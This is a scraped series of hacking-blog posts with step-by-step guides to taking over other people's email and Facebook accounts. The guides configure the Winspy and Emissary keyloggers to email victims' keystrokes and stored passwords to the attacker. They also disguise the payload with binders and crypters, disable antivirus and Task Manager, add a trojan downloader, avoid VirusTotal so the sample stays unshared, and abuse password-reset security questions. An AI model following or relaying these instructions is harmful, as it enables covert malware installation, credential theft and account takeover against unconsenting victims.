</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.</span></span></span></b></div></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><b><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6xh7p6yiadSHhiPqMjVK8XPb5yBGHjsqzIms1hxnL52yb4AcBXexk71cE4YwnfNCVdw_-1T71hlvFsURZ0Bg9ldkItYm67TgpvgOVM43hZO-MjHy6JTGdAB9F2Up8gvBmlmshAGA44Y/s1600-h/myspacehackingwinspykeylogger1.jpg" imageanchor="1" style="color: #e1771e; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><img alt="Winspy
keylogger to hack gmail passwsord" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ6xh7p6yiadSHhiPqMjVK8XPb5yBGHjsqzIms1hxnL52yb4AcBXexk71cE4YwnfNCVdw_-1T71hlvFsURZ0Bg9ldkItYm67TgpvgOVM43hZO-MjHy6JTGdAB9F2Up8gvBmlmshAGA44Y/s320/myspacehackingwinspykeylogger1.jpg" style="border-style: none; border-width: 0px; padding: 4px;" /></span></span></span><img class="snap_preview_icon" id="snap_com_shot_link_icon" src="http://i.ixnp.com/images/v6.59/t.gif" style="background-color: transparent; background-image: url(http://i.ixnp.com/images/v6.59/theme/silver/palette.gif); background-position: -1128px 0pt; background-repeat: no-repeat; border: 0pt none; display: inline; float: none; font-family: "trebuchet ms",arial,helvetica,sans-serif; font-style: normal; font-weight: normal; height: 12px; left: auto; line-height: normal; margin: 0pt ! important; max-height: 2000px; max-width: 2000px; min-height: 0px; min-width: 0px; padding: 1px 0pt 0pt; position: static; text-decoration: none; top: auto; vertical-align: top; visibility: visible; width: 14px;" /></a></b></div><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div style="text-align: center;"><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">5. Now, Winspy’s main screen will be displayed as shown in image below:</span></span></span></b></div></div></div><div style="margin: 0px;"><div class="separator" style="clear: both; margin: 0px; text-align: center;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div><div class="separator" style="clear: both; margin: 0px; text-align: center;"><b><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnW_z8H3sOfaKG3YvODi0pZqCRsHfbFipBshyphenhyphenz9EuhjTD2pDe7te21wQqqqQbnJuf8-Qg2ftkY_mzTOrw4xlzALT4TpXDBNX2EOjpUh1Hn1OK-m0HDyxROU8ezojKltGii0xt5wCqzo4/s1600-h/winspykeylogger.jpg" imageanchor="1" style="color: #e1771e; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfnW_z8H3sOfaKG3YvODi0pZqCRsHfbFipBshyphenhyphenz9EuhjTD2pDe7te21wQqqqQbnJuf8-Qg2ftkY_mzTOrw4xlzALT4TpXDBNX2EOjpUh1Hn1OK-m0HDyxROU8ezojKltGii0xt5wCqzo4/s400/winspykeylogger.jpg" style="border-style: none; border-width: 0px; padding: 4px;" width="400" /></span></span></span><img class="snap_preview_icon" id="snap_com_shot_link_icon" src="http://i.ixnp.com/images/v6.59/t.gif" style="background-color: transparent; background-image: url(http://i.ixnp.com/images/v6.59/theme/silver/palette.gif); background-position: -1128px 0pt; background-repeat: no-repeat; border: 0pt none; display: inline; float: none; font-family: "trebuchet ms",arial,helvetica,sans-serif; font-style: normal; font-weight: normal; height: 12px; left: auto; line-height: normal; margin: 0pt ! important; max-height: 2000px; max-width: 2000px; min-height: 0px; min-width: 0px; padding: 1px 0pt 0pt; position: static; text-decoration: none; top: auto; vertical-align: top; visibility: visible; width: 14px;" /></a></b></div><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div style="text-align: center;"><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">6. Select Remote at top, then Remote install.</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.</span></span></span></b></div></div></div><div style="margin: 0px;"><div class="separator" style="clear: both; margin: 0px; text-align: center;"><b><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC79tF6yn_gmQQtOA_E06lBA96RUFLElMjjjBvz2CFVSDlg90iMoB1fxEYC6nL45ZaRQtSBCOvf_PPkHlrSK2bZbTaBmb0KCeI2fmTUEqdLvGpWHkslgrw5-fUtK6sGFuwOJr-i803lzc/s1600-h/settingsforwinspykeylogger.jpg" imageanchor="1" style="color: #e1771e; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><img alt="hack gmail
password" border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC79tF6yn_gmQQtOA_E06lBA96RUFLElMjjjBvz2CFVSDlg90iMoB1fxEYC6nL45ZaRQtSBCOvf_PPkHlrSK2bZbTaBmb0KCeI2fmTUEqdLvGpWHkslgrw5-fUtK6sGFuwOJr-i803lzc/s400/settingsforwinspykeylogger.jpg" style="border-style: none; border-width: 0px; padding: 4px;" width="400" /></span></span></span><img class="snap_preview_icon" id="snap_com_shot_link_icon" src="http://i.ixnp.com/images/v6.59/t.gif" style="background-color: transparent; background-image: url(http://i.ixnp.com/images/v6.59/theme/silver/palette.gif); background-position: -1128px 0pt; background-repeat: no-repeat; border: 0pt none; display: inline; float: none; font-family: "trebuchet ms",arial,helvetica,sans-serif; font-style: normal; font-weight: normal; height: 12px; left: auto; line-height: normal; margin: 0pt ! important; max-height: 2000px; max-width: 2000px; min-height: 0px; min-width: 0px; padding: 1px 0pt 0pt; position: static; text-decoration: none; top: auto; vertical-align: top; visibility: visible; width: 14px;" /></a></b></div><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div style="text-align: center;"><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><br />
</span></span><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> </span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"></span></span></span></b></div></div></div></div><div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">.</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">user</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> - type in the victim’s name</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">.</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">file name</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> - Name the file to be sent. Use the name such that victim will love to accept it.</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">.</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">file <span4600023><a href="javascript:void(0);" id="Y4600023S8" style="color: #00f200; text-decoration: underline;">icon</a></span4600023> </span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">- keep it the same</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">.</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"><span4600023><a href="javascript:void(0);" id="Y4600023S7" style="color: #00f200; text-decoration: underline;">picture</a></span4600023> </span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">- select the picture you want to apply to the keylogger.</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">In the textfield of "</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">Email keylog to</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">Thats it. This much is enough. If you want, can change other settings also.</span></span></span></b></div></div></div><div style="margin: 0px;"><div style="margin: 0px;"><div style="margin: 0px;"><b><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">8. After you have completed changing settings, click on "</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">Create Remote file</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email <span4600023><a href="javascript:void(0);" id="Y4600023S6" style="color: #00f200; text-decoration: underline;">inbox</a></span4600023>. Thus, you will get all his passwords and thus will be able to hack his email accounts and even</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;"> Facebook account password</span></span></span><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span" style="font-size: x-small;">.</span></span></span></b></div></div></div></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com2tag:blogger.com,1999:blog-7264560992458786351.post-54975345192162703122011-07-16T06:47:00.000-07:002011-07-16T06:47:52.761-07:00Hacking Facebook Account Password<div class="separator" style="clear: both; text-align: center;"><a href="http://cyberworlds.at.ua/Facebook_Hacker.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://cyberworlds.at.ua/Facebook_Hacker.jpg" width="170" /></a></div><div style="color: black; text-align: justify;">Everyday I get emails wherein my readers ask me How to Hack a Facebook Account? You as the reader are most likely reading this because you want to hack into someone’s facebook account. So in this post I have decided to uncover the real and working way to hack any facebook account. Actually there are many ways to hack someones facebook password like Phishing, Keylogging or using Hacking softwares used to hack facebook password. In this post i'm going to show you how to hack someones facebook account password using a <a href="" id="Y1446406S1" style="text-decoration: underline;">keylogger</a> - Emissary <span3172554><a href="javascript:void(0);" id="Y3172554S1" style="text-decoration: underline;">Keylogger</a></span3172554>.</div><div style="color: black; text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="color: black;"><span style="font-size: 130%;"><span style="font-size: 100%;"><span style="font-weight: bold;">How to Hack Facebook Password using Keylogger?</span></span></span><br />
<br />
1. First of all <a href="http://adf.ly/20MnC">Download Emissary Keylogger</a>. It takes screenshots of the victim's computer and sends it to your gmail along with the logs.<br />
<br />
2. Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from <a href="http://www.microsoft.com/net/">www.microsoft.com/net/</a>. Else it won't work.<br />
<br />
3. Extract the files using WinRar or any other zip/unzip program.<br />
<br />
4. Open "Emissary.<a href="" id="Y1446406S9" style="text-decoration: underline;">exe</a>" to see something like this:<br />
<br />
5. Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you're going to use only for keylogging). Enter the email adress where you wanna receive facebook passwords. Choose a name for the server.<span3172554><a href="javascript:void(0);" id="Y3172554S6" style="text-decoration: underline;">exe</a></span3172554> file. You can set timer as you wish. This timer controls the time interval between two logs emails.<br />
<br />
6. In the "Options" section you can see what this evil little buddy can do ;)<br />
<ul><li><span style="font-weight: bold;">Block AV Sites</span>: Blocks VirusScanning Websites on victim's computer</li>
<li><span style="font-weight: bold;">Add to Startup</span>: Adds to Startup via Registry</li>
<li><span style="font-weight: bold;">Antis</span>: Anubis, BitDefender, Kaspersky, Keyscrambler, <a href="" id="Y1446406S7" style="text-decoration: underline;">Malwarebytes</a>, NOD32, Norman, Ollydbg, Outpost, Wireshark</li>
<li><span style="font-weight: bold;">Disable TaskManager</span>: Disable TaskManager on victim's PC</li>
<li><span style="font-weight: bold;">Disable Regedit</span>: Disable's Regedit on victim's PC</li>
</ul><a href="http://adf.ly/356733/http://2.bp.blogspot.com/_F7GuXCzPQdY/S-3uByjriSI/AAAAAAAAD6Q/xLbsbNDJ5N8/s1600/Facebook+Hacker+2.bmp"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5471290836843727138" src="http://2.bp.blogspot.com/_F7GuXCzPQdY/S-3uByjriSI/AAAAAAAAD6Q/xLbsbNDJ5N8/s400/Facebook+Hacker+2.bmp" style="cursor: pointer; display: block; height: 304px; margin: 0px auto 10px; text-align: center; width: 229px;" /></a><br />
7. Check "<span3172554><a href="javascript:void(0);" id="Y3172554S7" style="text-decoration: underline;">Trojan</a></span3172554> <span3172554><a href="javascript:void(0);" id="Y3172554S8" style="text-decoration: underline;">Downloader</a></span3172554>" to Downloade and Execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:<br />
<br />
<a href="http://adf.ly/356733/http://1.bp.blogspot.com/_F7GuXCzPQdY/S-3vIKg1eQI/AAAAAAAAD6Y/sizz3Le0PeM/s1600/Facebook+Hacker+3.bmp"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5471292045865089282" src="http://1.bp.blogspot.com/_F7GuXCzPQdY/S-3vIKg1eQI/AAAAAAAAD6Y/sizz3Le0PeM/s400/Facebook+Hacker+3.bmp" style="cursor: pointer; display: block; height: 124px; margin: 0px auto 10px; text-align: center; width: 223px;" /></a><br />
8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.<br />
<br />
9. Now, to hack facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.<br />
<br />
10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to <a href="" id="Y1446406S4" style="text-decoration: underline;">Free Fil</a>e Storage Domains, like Mediafire, Speedyshare, Ziddu.com, etc.<br />
<br />
11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:<br />
<br />
<a href="http://adf.ly/356733/http://4.bp.blogspot.com/_F7GuXCzPQdY/S-3yqx5lSpI/AAAAAAAAD6g/Az5fXvs8Wu4/s1600/Windows%2Bpassword%2Bstealer1.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5471295939088304786" src="http://4.bp.blogspot.com/_F7GuXCzPQdY/S-3yqx5lSpI/AAAAAAAAD6g/Az5fXvs8Wu4/s400/Windows%2Bpassword%2Bstealer1.png" style="cursor: pointer; display: block; height: 252px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
Now you have all victim email passwords in your inbox and you can now hack victim facebook accounts easily. I have personally tested this <a href="" id="Y1446406S2" style="text-decoration: underline;">free keylogge</a>r and found it working 100%. Enjoy Hacking.<br />
<br />
<br />
<span style="font-weight: bold;">Very Important:</span> Do not scan these tools on VirusTotal. Use <a href="http://scanner.novirusthanks.org/">http://scanner.novirusthanks.org</a> and also check the "Do not distribute the sample" option.<br />
<br />
<a href="http://adf.ly/356733/http://1.bp.blogspot.com/_F7GuXCzPQdY/S7pIg7mlitI/AAAAAAAADnY/L5hFpPAOJ5E/s1600/nvt.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5456753629105326802" src="http://1.bp.blogspot.com/_F7GuXCzPQdY/S7pIg7mlitI/AAAAAAAADnY/L5hFpPAOJ5E/s400/nvt.png" style="cursor: pointer; display: block; height: 112px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a> <br />
<br />
Do you have questions, comments, or suggestions? Feel free to post a comment! </span><span style="color: #00cfff;"></span></div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-79311332864181124312011-07-16T06:45:00.000-07:002011-07-16T06:45:04.486-07:00Facebook Password Decrypter 2011<div class="separator" style="clear: both; text-align: center;"><a href="http://securityxploded.com/images/facebookpassworddecryptor_main.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="152" src="http://securityxploded.com/images/facebookpassworddecryptor_main.jpg" width="200" /></a></div><div style="color: black; text-align: justify;"></div><div align="justify"><span style="font-size: small;">Facebook Password Decryptor is the FREE software to instantly recover stored Facebook account passwords stored by popular web browsers and messengers. Most of the applications store the Login passwords to prevent hassale of entering the password everytime by the user. Often these applications use their own proprietary encryption mechanism to store the login passwords including Facebook account passwords. Facebook Password Decryptor automatically crawls through each of these applications and instantly recovers the encrypted Facebook account password. Facebook Password Decryptor presents both GUI interface as well as command line version, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials who can get hold of any stored Facebook Login passwords which can give vital clue in their investigation. FacebookPasswordDecryptor is fully Portable software which can be directly run anywhere without installing locally. It also comes with Installer for those who wants to install it locally and use it on regular basis. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7. <br />
<br />
Features of FacebookPasswordDecryptor <br />
FacebookPasswordDecryptor supports recovering of the stored Facebook account password from most of the popular Internet browsers and messengers. Here is the complete list of supported applications. <br />
<br />
Internet Explorer <br />
Firefox <br />
Google Chrome <br />
Opera Browser <br />
Apple Safari <br />
Flock Browser <br />
Paltalk Messenger <br />
Miranda Messenger <br />
<br />
Here are the highlights of top features of FacebookPasswordDecryptor which makes it stand apart from other similar tools including commercial ones. <br />
<br />
Instantly decrypt and recover stored encrypted Facebook account password from Popular Web browsers and Messengers. <br />
Comes with both GUI interface as well as Command-line version. <br />
Support recovering multiple Facebook accounts stored with any of the supported applications. <br />
Automatically discovers the supported applications from their respective install location and recovers the password instantly. <br />
Sort feature to arrange the displayed password list by username and password which makes it easy to search through 100's of entries. <br />
Save the recovered Facebook password list to HTML/TEXT file for transferring to other system or for future use. <br />
Easier and faster to use with its enhanced user friendly interface. <br />
Completely Portable Software which also comes with optional Installer for assisting you in local Installation & Uninstallation. <br />
<br />
1: FacebookPasswordDecryptor showing the recovered Facebook password accounts from various applications. <br />
2: Command line usage of FacebookPasswordDecryptor showing various examples. <br />
3.Exported Facebook account password list in HTML format by FacebookPasswordDecryptor. </span> </div><div align="justify"><span style="font-size: small;"><span style="font-style: italic;"><span><span style="font-family: Tahoma;"></span></span></span><br />
Download <a href="http://adf.ly/1W48l">Facebook Password Decrypter 2011</a></span> </div>cyberworldshttp://www.blogger.com/profile/05414601679042826965noreply@blogger.com1tag:blogger.com,1999:blog-7264560992458786351.post-5761604182310136002011-07-16T06:43:00.000-07:002011-07-16T06:43:06.761-07:00Hack Facebook Accounts For Free<div style="color: black;"><br />
"<b>Hack Facebook Account</b>" is the term which we all want to learn. Now facebook.com is the best and top second website in the world. So with this their is a great increase in search engines for the word term "<b>Hack Facebook Accounts For Free</b>" . So today I am going to post a new hacking article on <b>Hacking Of Facebook Account<br />
</b><i>Hack Facebook Account</i> with retrieve/ Forgot Password is the <span3403734><a href="javascript:void(0);" id="Y3403734S8" style="text-decoration: underline;">best way</a></span3403734> to hack friends facebook account. About 80% Facebook.com users are Novice (new) and they always keep very insecure security questions. By entering the correct answer you will get the access to the victim's Facebook account after the delay of 24 hours. Thus this is the best way to <b>Hack Facebook Account Passwords<br />
</b></div><div style="color: black; text-align: justify;"><h1 style="background-color: #cccccc;"><span style="font-size: x-small;">Hack Facebook Account - Hack Facebook Accounts For Free Online</span></h1>So to <b>Hack Facebook Accounts</b> just follow these steps and you are done :<br />
<ul style="text-align: left;"><li>First Go To <span3403734><a href="javascript:void(0);" id="Y3403734S1" style="text-decoration: underline;">Facebook Login</a></span3403734> (facebook.com) And click on <a href="http://adf.ly/1v0C2"><b>Forgot your Password?</b></a></li>
<li>And enter the victim's email and full name as shown in the screenshot :</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://adf.ly/356733/https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwmqpJyDXm7rg7kZm46ELyiFMDSJaPhyphenhyphenJyb3z4-KFD5fZMv8XVgNUtHp0Y9I8hnIfy-gunjtZdF21CH6YNZsRvZuXhlCYZmuUmVCnoWwtyNQat-kV2iQQjkBpf1sgxjXYUKSiPZgiKnv3u/s1600/hack+facebook+account.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwmqpJyDXm7rg7kZm46ELyiFMDSJaPhyphenhyphenJyb3z4-KFD5fZMv8XVgNUtHp0Y9I8hnIfy-gunjtZdF21CH6YNZsRvZuXhlCYZmuUmVCnoWwtyNQat-kV2iQQjkBpf1sgxjXYUKSiPZgiKnv3u/s1600/hack+facebook+account.jpg" /></a></div><ul style="text-align: left;"><li>Now Click on Search and enter the Chaptcha, After click on "This Is My Account"</li>
<li>Now you will get the option of "Reset Your Password" then do like below:</li>
